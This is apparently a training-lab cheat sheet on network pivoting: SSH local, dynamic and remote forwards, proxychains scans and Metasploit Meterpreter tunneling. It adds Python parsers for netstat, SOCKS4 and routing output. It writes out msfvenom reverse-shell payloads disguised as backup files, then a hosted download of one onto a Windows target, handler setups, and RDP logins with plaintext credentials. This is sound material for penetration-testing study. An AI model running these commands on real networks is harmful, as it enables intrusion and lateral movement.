Port Forwarding

SSH Local Port Forwarding

Scan the Pivot Host

Identifies open ports on the pivot host to confirm that SSH is reachable; MySQL on 3306 is closed to the outside, which is why it is tunneled over SSH below.

C:\mrci0x1> nmap -sT -p22,3306 10.129.202.64
Starting Nmap 7.92 (https://nmap.org) at 2022-02-24 12:12 EST
Nmap scan report for 10.129.202.64
Host is up (0.12s latency).

PORT     STATE  SERVICE
22/tcp   open   ssh
3306/tcp closed mysql

Nmap done: 1 IP address (1 host up) scanned in 0.68 seconds

Set Up Local Port Forwarding

Binds local port 9999 and tunnels every connection to it through the SSH session to port 3306 on the pivot host (the `localhost` in the forward spec is resolved on the pivot side).

C:\mrci0x1> ssh -L 9999:localhost:3306 tobias@10.129.202.64

Verify the Forward

Checks that local port 9999 is listening; both sockets belong to the ssh client process (PID 4034), which is the host-side footprint of an active -L forward.

C:\mrci0x1> netstat -antp | grep 9999
tcp        0      0 127.0.0.1:9999          0.0.0.0:*               LISTEN      4034/ssh
tcp6       0      0 ::1:9999                :::*                    LISTEN      4034/ssh

Scans local port 9999 to confirm MySQL service availability.

C:\mrci0x1> nmap -v -sV -p9999 localhost
PORT     STATE SERVICE VERSION
9999/tcp open  mysql   MySQL 8.0.28-0ubuntu0.20.04.3
Nmap done: 1 IP address (1 host up) scanned in 1.18 seconds

Forward Multiple Ports

Adds a second -L forward in the same session (local 8080 to Apache on pivot port 80) so several services are reachable at once.

C:\mrci0x1> ssh -L 9999:localhost:3306 -L 8080:localhost:80 ubuntu@10.129.202.64
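The netstat check above is the host-side footprint of an SSH forward: a listening socket owned by the ssh client. This added Python example (mine, not code from the page or from OpenSSH) parses `netstat -antp` output in that layout, with constructed sample lines, and groups listening ports by ssh client PID; on any host, an ssh client holding listeners is a -L or -D tunnel that needs explaining.

```python
from __future__ import annotations
from dataclasses import dataclass

# Constructed sample in the layout of `netstat -antp` on this page
# (not captured from the page's hosts).
SAMPLE_NETSTAT = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:9999          0.0.0.0:*               LISTEN      4034/ssh
tcp6       0      0 ::1:9999                :::*                    LISTEN      4034/ssh
tcp        0      0 127.0.0.1:9050          0.0.0.0:*               LISTEN      4034/ssh
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      812/sshd
tcp        0      0 127.0.0.1:54652         127.0.0.1:3300          ESTABLISHED 4075/xfreerdp
"""

@dataclass(frozen=True)
class Listener:
    proto: str
    addr: str
    port: int
    pid: int
    program: str

def parse_listeners(text: str) -> list[Listener]:
    """Return every LISTEN socket with the PID/program that owns it."""
    found = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 7 or parts[5] != "LISTEN":
            continue                      # header, blank, or non-listening socket
        addr, _, port = parts[3].rpartition(":")   # rpartition keeps IPv6 "::1" intact
        pid, _, prog = parts[6].partition("/")
        if not pid.isdigit():
            continue                      # "-" when netstat may not see the owner
        found.append(Listener(parts[0], addr, int(port), int(pid), prog))
    return found

def ssh_client_forwards(text: str) -> dict[int, set[int]]:
    """Map each ssh *client* PID to the local ports it listens on.

    The ssh client (program "ssh", unlike the "sshd" daemon) opens no
    listening socket unless it is carrying a -L or -D forward, so every
    entry returned here is an active tunnel endpoint.
    """
    forwards: dict[int, set[int]] = {}
    for l in parse_listeners(text):
        if l.program == "ssh":
            forwards.setdefault(l.pid, set()).add(l.port)
    return forwards
```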

Dynamic Port Forwarding with SOCKS Proxy

Inspect the Pivot Host

Verifies network interfaces on the pivot host to identify internal network access.

C:\pivot_host> ifconfig
ens192: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.129.202.64  netmask 255.255.0.0  broadcast 10.129.255.255

ens224: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.16.5.129  netmask 255.255.254.0  broadcast 172.16.5.255

Set Up Dynamic Port Forwarding

Starts an SSH session whose client listens on local port 9050 as a SOCKS proxy; any connection handed to it is relayed through the pivot host, which can then reach the internal 172.16.5.0/23 network seen on ens224.

C:\mrci0x1> ssh -D 9050 ubuntu@10.129.202.64

Configure Proxychains

Displays the last lines of the proxychains configuration; the final entry must point proxychains at the SSH SOCKS listener on 127.0.0.1:9050.

C:\mrci0x1> tail -n 4 /etc/proxychains.conf
# defaults set to "tor"
socks4  127.0.0.1 9050

Scan the Internal Network

Performs a ping scan on a range to discover live hosts via the SOCKS proxy. A SOCKS proxy relays only TCP connections made through connect(), so ICMP and other raw-socket probes never traverse the tunnel; results from this scan are unreliable, and the full connect scan below is the dependable method.

C:\mrci0x1> proxychains nmap -v -sn 172.16.5.1-20
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.92 (https://nmap.org) at 2022-02-24 12:30 EST
Initiating Ping Scan at 12:30
Scanning 10 hosts [2 ports/host]

Scans a specific host with host discovery disabled (-Pn) and a full TCP connect scan (-sT), the only scan type proxychains can relay because it intercepts connect() calls.

C:\mrci0x1> proxychains nmap -v -Pn -sT 172.16.5.19
ProxyChains-3.1 (http://proxychains.sf.net)
Discovered open port 445/tcp on 172.16.5.19
Discovered open port 135/tcp on 172.16.5.19
Discovered open port 3389/tcp on 172.16.5.19
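What the proxy on 127.0.0.1:9050 actually receives from a proxychains-wrapped tool is a SOCKS4/4a CONNECT request naming one TCP destination, which is why only TCP connections cross the tunnel. This added Python example (mine, not proxychains or Nmap code) encodes and decodes that request format; the sample bytes and the `dc01` hostname are constructed for illustration.

```python
import socket
import struct
from dataclasses import dataclass

@dataclass(frozen=True)
class Socks4Request:
    command: str   # "CONNECT" or "BIND"
    host: str      # dotted IPv4, or a hostname when the 4a extension is used
    port: int
    userid: str

def parse_socks4_request(data: bytes) -> Socks4Request:
    """Decode VN | CD | DSTPORT | DSTIP | USERID NUL [| DOMAIN NUL for 4a]."""
    if len(data) < 9 or data[0] != 4:
        raise ValueError("not a SOCKS4 request")
    command = {1: "CONNECT", 2: "BIND"}.get(data[1])
    if command is None:
        raise ValueError(f"unknown SOCKS4 command {data[1]}")
    (port,) = struct.unpack("!H", data[2:4])
    ip, rest = data[4:8], data[8:]
    userid, sep, rest = rest.partition(b"\x00")
    if not sep:
        raise ValueError("USERID not NUL-terminated")
    # SOCKS4a: DSTIP of 0.0.0.x (x != 0) means the proxy must resolve the
    # hostname that follows the USERID; the client never resolved it itself.
    if ip[:3] == b"\x00\x00\x00" and ip[3] != 0:
        name, sep, _ = rest.partition(b"\x00")
        if not sep:
            raise ValueError("SOCKS4a hostname not NUL-terminated")
        host = name.decode("ascii")
    else:
        host = socket.inet_ntoa(ip)
    return Socks4Request(command, host, port, userid.decode("ascii"))

def build_socks4_request(host: str, port: int, userid: str = "") -> bytes:
    """Encode a CONNECT; uses the 4a form when host is not an IPv4 literal."""
    try:
        ip, tail = socket.inet_aton(host), b""
    except OSError:
        ip, tail = b"\x00\x00\x00\x01", host.encode("ascii") + b"\x00"
    return b"\x04\x01" + struct.pack("!H", port) + ip + userid.encode("ascii") + b"\x00" + tail

# Constructed sample: the request the proxy on 127.0.0.1:9050 sees when the
# proxychains-wrapped Nmap on this page connects to 172.16.5.19:3389.
SAMPLE_REQUEST = bytes.fromhex("04010d3dac10051300")
```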

Pivoting with Metasploit

Start Metasploit with Proxychains

Launches Metasploit through proxychains to route traffic via the SOCKS proxy.

C:\mrci0x1> proxychains msfconsole

Use the RDP Scanner Module

Selects the RDP scanner module to check for RDP services.

C:\mrci0x1> use auxiliary/scanner/rdp/rdp_scanner

Sets the target host for the RDP scan.

C:\mrci0x1> set rhosts 172.16.5.19

Executes the RDP scan to confirm service availability.

C:\mrci0x1> run
[*] 172.16.5.19:3389 - Detected RDP on 172.16.5.19:3389 (name:DC01) (os_version:10.0.17763)
[*] Scanned 1 of 1 hosts (100% complete)

Accessing Services via Pivoting

Connects to an RDP service on the internal host using proxychains.

C:\mrci0x1> proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123
ProxyChains-3.1 (http://proxychains.sf.net)
[13:02:42:481] [INFO][com.freerdp.core] - freerdp_connect:freerdp_set_last_error_ex resetting error state
[13:02:42:482] [INFO][com.freerdp.client.common.cmdline] - loading channelEx rdpdr

Remote Port Forwarding

Create a Meterpreter Payload

Generates a Windows payload to connect back to the pivot host’s internal IP.

C:\mrci0x1> msfvenom -p windows/x64/meterpreter/reverse_https lhost=172.16.5.129 -f exe -o backupscript.exe LPORT=8080
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 712 bytes
Final size of exe file: 7168 bytes
Saved as: backupscript.exe

Configure the Metasploit Listener

Selects the multi-handler module to catch the reverse connection.

C:\mrci0x1> use exploit/multi/handler

Sets the payload type for the reverse HTTPS connection.

C:\mrci0x1> set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https

Configures the listener to bind on all interfaces.

C:\mrci0x1> set lhost 0.0.0.0
lhost => 0.0.0.0

Sets the listener port to 8000.

C:\mrci0x1> set lport 8000
lport => 8000

Starts the listener to wait for the reverse connection.

C:\mrci0x1> run
[*] Started HTTPS reverse handler on https://0.0.0.0:8000

Transfer the Payload to the Pivot Host

Copies the payload to the pivot host for further distribution.

C:\mrci0x1> scp backupscript.exe ubuntu@10.129.202.64:~/
backupscript.exe                                   100% 7168    65.4KB/s   00:00

Host the Payload on the Pivot Host

Starts an HTTP server on the pivot host to serve the payload.

C:\pivot_host> python3 -m http.server 8123

Download the Payload to the Windows Host

Downloads the payload from the pivot host to the Windows target.

C:\windows> Invoke-WebRequest -Uri "http://172.16.5.129:8123/backupscript.exe" -OutFile "C:\backupscript.exe"

Set Up Remote Port Forwarding

Makes sshd on the pivot host listen on 172.16.5.129:8080 and relay each incoming connection back through the SSH session to port 8000 on the attack host (-N opens no shell, -v prints the debug lines below). Binding a remote forward to a non-loopback address requires GatewayPorts yes or clientspecified in the pivot's sshd_config; with the default of no, the listener is placed on 127.0.0.1 instead.

C:\mrci0x1> ssh -R 172.16.5.129:8080:0.0.0.0:8000 ubuntu@10.129.202.64 -vN
debug1: client_request_forwarded_tcpip: listen 172.16.5.129 port 8080, originator 172.16.5.19 port 61355
debug1: connect_next: host 0.0.0.0 ([0.0.0.0]:8000) in progress, fd=5
debug1: channel 1: new [172.16.5.19]
debug1: confirm forwarded-tcpip
debug1: channel 0: free: 172.16.5.19, nchannels 2
debug1: channel 1: connected to 0.0.0.0 port 8000
debug1: channel 1: free: 172.16.5.19, nchannels 1
debug1: client_input_channel_open: ctype forwarded-tcpip rchan 2 win 2097152 max 32768
debug1: client_request_forwarded_tcpip: listen 172.16.5.129 port 8080, originator 172.16.5.19 port 61356
debug1: connect_next: host 0.0.0.0 ([0.0.0.0]:8000) in progress, fd=4
debug1: channel 0: new [172.16.5.19]
debug1: confirm forwarded-tcpip
debug1: channel 0: connected to 0.0.0.0 port 8000
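The debug lines above record one forwarded-tcpip channel per inbound connection on the pivot's 172.16.5.129:8080 listener. This added Python example (mine, not part of the page or of OpenSSH) pairs each `client_request_forwarded_tcpip` line with the `connect_next` line that follows it, reconstructing which internal host used the reverse forward and where its traffic was delivered; the sample log is a constructed copy in that format.

```python
import re
from collections import defaultdict

# Constructed excerpt in the format of the `ssh -R ... -vN` debug output on this page.
SAMPLE_LOG = """\
debug1: client_request_forwarded_tcpip: listen 172.16.5.129 port 8080, originator 172.16.5.19 port 61355
debug1: connect_next: host 0.0.0.0 ([0.0.0.0]:8000) in progress, fd=5
debug1: channel 1: new [172.16.5.19]
debug1: confirm forwarded-tcpip
debug1: channel 1: connected to 0.0.0.0 port 8000
debug1: client_request_forwarded_tcpip: listen 172.16.5.129 port 8080, originator 172.16.5.19 port 61356
debug1: connect_next: host 0.0.0.0 ([0.0.0.0]:8000) in progress, fd=4
debug1: channel 0: new [172.16.5.19]
debug1: confirm forwarded-tcpip
debug1: channel 0: connected to 0.0.0.0 port 8000
"""

# The sshd side tells the client where the connection arrived and who originated it...
REQ = re.compile(r"client_request_forwarded_tcpip: listen (\S+) port (\d+), originator (\S+) port (\d+)")
# ...and the client then dials the local target given in the -R spec.
CONNECT = re.compile(r"connect_next: host (\S+) \(\[[^\]]*\]:(\d+)\)")

def reverse_forward_sessions(log: str) -> list[dict]:
    """Pair each remote-side connection with the local target ssh dialled for it."""
    sessions, pending = [], None
    for line in log.splitlines():
        m = REQ.search(line)
        if m:
            pending = {"listen": f"{m[1]}:{m[2]}", "originator": f"{m[3]}:{m[4]}", "target": None}
            sessions.append(pending)
            continue
        m = CONNECT.search(line)
        if m and pending is not None:
            pending["target"] = f"{m[1]}:{m[2]}"
            pending = None
    return sessions

def originators_by_listener(log: str) -> dict[str, set[str]]:
    """Which internal hosts (ephemeral ports stripped) reached each remote listener."""
    seen = defaultdict(set)
    for s in reverse_forward_sessions(log):
        seen[s["listen"]].add(s["originator"].rsplit(":", 1)[0])
    return dict(seen)
```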

Meterpreter Tunneling

Establishing a Meterpreter Session on the Pivot Host

Create a Meterpreter Payload

Generates a Linux payload for establishing a Meterpreter session on the pivot host.

C:\mrci0x1> msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.10.14.18 -f elf -o backupjob LPORT=8080
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 130 bytes
Final size of elf file: 250 bytes
Saved as: backupjob

Configure the Metasploit Listener

Selects the multi-handler for the Linux Meterpreter payload.

C:\mrci0x1> use exploit/multi/handler

Sets the listener to bind on all interfaces.

C:\mrci0x1> set lhost 0.0.0.0
lhost => 0.0.0.0

Sets the listener port to 8080.

C:\mrci0x1> set lport 8080
lport => 8080

Configures the payload type for the Linux reverse TCP connection.

C:\mrci0x1> set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp

Starts the listener for the Linux payload.

C:\mrci0x1> run
[*] Started reverse TCP handler on 0.0.0.0:8080

Transfer and Execute the Payload

Copies the Linux payload to the pivot host.

C:\mrci0x1> scp backupjob ubuntu@10.129.202.64:~/

Makes the payload executable on the pivot host.

C:\pivot_host> chmod +x backupjob

Executes the payload to establish a Meterpreter session.

C:\pivot_host> ./backupjob
[*] Sending stage (3020772 bytes) to 10.129.202.64
[*] Meterpreter session 1 opened (10.10.14.18:8080 -> 10.129.202.64:39826 ) at 2022-03-03 12:27:43 -0500
meterpreter > pwd
/home/ubuntu

Network Enumeration with Meterpreter

Ping Sweep

Runs a ping sweep to discover live hosts in the internal network.

C:\mrci0x1> run post/multi/gather/ping_sweep RHOSTS=172.16.5.0/23
[*] Performing ping sweep for IP range 172.16.5.0/23

Alternative Ping Sweep Methods

Uses a bash loop for ping sweep if ICMP is blocked (Linux pivot).

C:\pivot_host> for i in {1..254} ;do (ping -c 1 172.16.5.$i | grep "bytes from" &) ;done

Uses CMD for ping sweep if ICMP is blocked (Windows pivot).

C:\windows> for /L %i in (1 1 254) do ping 172.16.5.%i -n 1 -w 100 | find "Reply"

Uses PowerShell for ping sweep if ICMP is blocked (Windows pivot).

C:\windows> 1..254 | % {"172.16.5.$($_): $(Test-Connection -count 1 -comp 172.16.5.$($_) -quiet)"}

Configuring a SOCKS Proxy for Scanning

Set Up the SOCKS Proxy

Selects the SOCKS proxy module in Metasploit.

C:\mrci0x1> use auxiliary/server/socks_proxy

Sets the SOCKS proxy port to 9050.

C:\mrci0x1> set SRVPORT 9050
SRVPORT => 9050

Configures the SOCKS proxy to bind on all interfaces.

C:\mrci0x1> set SRVHOST 0.0.0.0
SRVHOST => 0.0.0.0

Sets the SOCKS version to 4a for compatibility.

C:\mrci0x1> set version 4a
version => 4a

Starts the SOCKS proxy server.

C:\mrci0x1> run
[*] Auxiliary module running as background job 0.
[*] Starting the SOCKS proxy server

Lists running jobs to verify the SOCKS proxy.

C:\mrci0x1> jobs
Jobs
====

  Id  Name                           Payload  Payload opts
  --  ----                           -------  ------------
  0   Auxiliary: server/socks_proxy

Configure Proxychains

Appends SOCKS proxy settings to proxychains.conf.

C:\mrci0x1> echo "socks4 127.0.0.1 9050" >> /etc/proxychains.conf

Add Routes with AutoRoute

Selects the autoroute module to route traffic.

C:\mrci0x1> use post/multi/manage/autoroute

Sets the Meterpreter session ID for routing.

C:\mrci0x1> set SESSION 1
SESSION => 1

Specifies the subnet for routing.

C:\mrci0x1> set SUBNET 172.16.5.0
SUBNET => 172.16.5.0

Executes the autoroute module to add routes.

C:\mrci0x1> run
[!] SESSION may not be compatible with this module:
[!]  * incompatible session platform: linux
[*] Running module against 10.129.202.64
[*] Searching for subnets to autoroute.
[+] Route added to subnet 10.129.0.0/255.255.0.0 from host's routing table.
[+] Route added to subnet 172.16.5.0/255.255.254.0 from host's routing table.
[*] Post module execution completed

Adds a route directly from the Meterpreter session.

C:\mrci0x1> run autoroute -s 172.16.5.0/23
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 172.16.5.0/255.255.254.0...
[+] Added route to 172.16.5.0/255.255.254.0 via 10.129.202.64
[*] Use the -p option to list all active routes

Displays active routes to verify configuration.

C:\mrci0x1> run autoroute -p
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Active Routing Table
====================
   Subnet             Netmask            Gateway
   ------             -------            -------
   10.129.0.0         255.255.0.0        Session 1
   172.16.4.0         255.255.254.0      Session 1
   172.16.5.0         255.255.254.0      Session 1
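The routing table above decides which session Metasploit uses for a destination. This added Python example (mine, not Metasploit code) parses that listing and resolves addresses against it with the standard longest-prefix rule; it also shows that the 172.16.5.0/255.255.254.0 entry, once its host bits are masked, is the same 172.16.4.0/23 network as the row above it. The sample text is a constructed copy of the table.

```python
from __future__ import annotations
import ipaddress
from dataclasses import dataclass

# Constructed copy of the `run autoroute -p` listing shown on this page.
SAMPLE_TABLE = """\
Active Routing Table
====================
   Subnet             Netmask            Gateway
   ------             -------            -------
   10.129.0.0         255.255.0.0        Session 1
   172.16.4.0         255.255.254.0      Session 1
   172.16.5.0         255.255.254.0      Session 1
"""

@dataclass(frozen=True)
class Route:
    network: ipaddress.IPv4Network
    gateway: str

def parse_routing_table(text: str) -> list[Route]:
    """Parse rows of 'Subnet Netmask Gateway'; skips the title and header lines."""
    routes = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3 or not parts[0][0].isdigit():
            continue
        subnet, netmask, gateway = parts[0], parts[1], " ".join(parts[2:])
        # strict=False masks host bits: 172.16.5.0/255.255.254.0 is really 172.16.4.0/23,
        # the same network as the row above it (autoroute added both from the pivot's table).
        routes.append(Route(ipaddress.ip_network(f"{subnet}/{netmask}", strict=False), gateway))
    return routes

def route_for(routes: list[Route], ip: str) -> str | None:
    """Standard longest-prefix match; None means no pivot route (traffic goes direct)."""
    addr = ipaddress.ip_address(ip)
    best: Route | None = None
    for r in routes:
        if addr in r.network and (best is None or r.network.prefixlen > best.network.prefixlen):
            best = r
    return best.gateway if best else None
```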

Scan with Nmap

Scans the target host for RDP using proxychains and Nmap.

C:\mrci0x1> proxychains nmap 172.16.5.19 -p3389 -sT -v -Pn
ProxyChains-3.1 (http://proxychains.sf.net)
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-03 13:40 EST
Initiating Parallel DNS resolution of 1 host. at 13:40
Completed Parallel DNS resolution of 1 host. at 13:40, 0.12s elapsed
Initiating Connect Scan at 13:40
Scanning 172.16.5.19 [1 port]
|S-chain|-<>-127.0.0.1:9050-<><>-172.16.5.19 :3389-<><>-OK
Discovered open port 3389/tcp on 172.16.5.19
Completed Connect Scan at 13:40, 0.12s elapsed (1 total ports)
Nmap scan report for 172.16.5.19
Host is up (0.12s latency).
PORT     STATE SERVICE
3389/tcp open  ms-wbt-server
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.45 seconds

Meterpreter Port Forwarding

Local Port Forwarding

Forwards local port 3300 to RDP on the target host.

C:\mrci0x1> portfwd add -l 3300 -p 3389 -r 172.16.5.19
[*] Local TCP relay created: :3300 <-> 172.16.5.19:3389

Connects to the forwarded RDP service locally.

C:\mrci0x1> xfreerdp /v:localhost:3300 /u:victor /p:pass@123

Verifies the local port forwarding connection.

C:\mrci0x1> netstat -antp
tcp        0      0 127.0.0.1:54652         127.0.0.1:3300          ESTABLISHED 4075/xfreerdp

Reverse Port Forwarding

Makes the pivot host listen on port 1234 and relay each connection through the Meterpreter session to port 8081 on the attack host (10.10.14.18), so a reverse shell from an internal host aimed at the pivot reaches the handler.

C:\mrci0x1> portfwd add -R -l 8081 -p 1234 -L 10.10.14.18
[*] Local TCP relay created: 10.10.14.18:8081 <-> :1234

Selects the multi-handler for the reverse shell.

C:\mrci0x1> use exploit/multi/handler

Sets the payload for the Windows reverse TCP connection.

C:\mrci0x1> set payload windows/x64/meterpreter/reverse_tcp

Configures the listener to bind on all interfaces.

C:\mrci0x1> set LHOST 0.0.0.0

Sets the listener port to 8081.

C:\mrci0x1> set LPORT 8081

Starts the listener for the reverse shell.

C:\mrci0x1> run

Generates a Windows payload for the reverse shell.

C:\mrci0x1> msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.5.129 -f exe -o backupscript.exe LPORT=1234
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: backupscript.exe
